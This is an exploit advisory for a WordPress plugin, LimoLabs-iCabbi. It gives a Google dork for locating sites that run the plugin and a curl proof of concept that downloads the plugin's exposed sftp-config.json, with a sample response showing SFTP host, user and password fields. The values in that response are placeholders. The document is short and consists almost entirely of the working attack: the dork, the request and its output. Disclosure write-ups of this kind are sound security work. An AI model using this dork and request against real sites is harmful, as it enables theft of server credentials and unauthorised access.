# Exploit Title: Wordpress Plugin LimoLabs-iCabbi Remote Password Disclosure # Google Dork: inurl:"plugins/limolabs-icabbi" # Date: 22/07/2018 # Exploit Author: Gabriel Lipski ( gabriel.lipski[AT]protonmail.com ) # Vendor Homepage: https://www.icabbi.com # Tested on: Ubuntu 12.04.5 / Debian 9.4 * PoC: $ curl http:///wp-content/plugins/limolabs-icabbi/sftp-config.json * Response: ... "host": "1.3.3.7", "user": "foo", "password": "bar", "port": "22", ...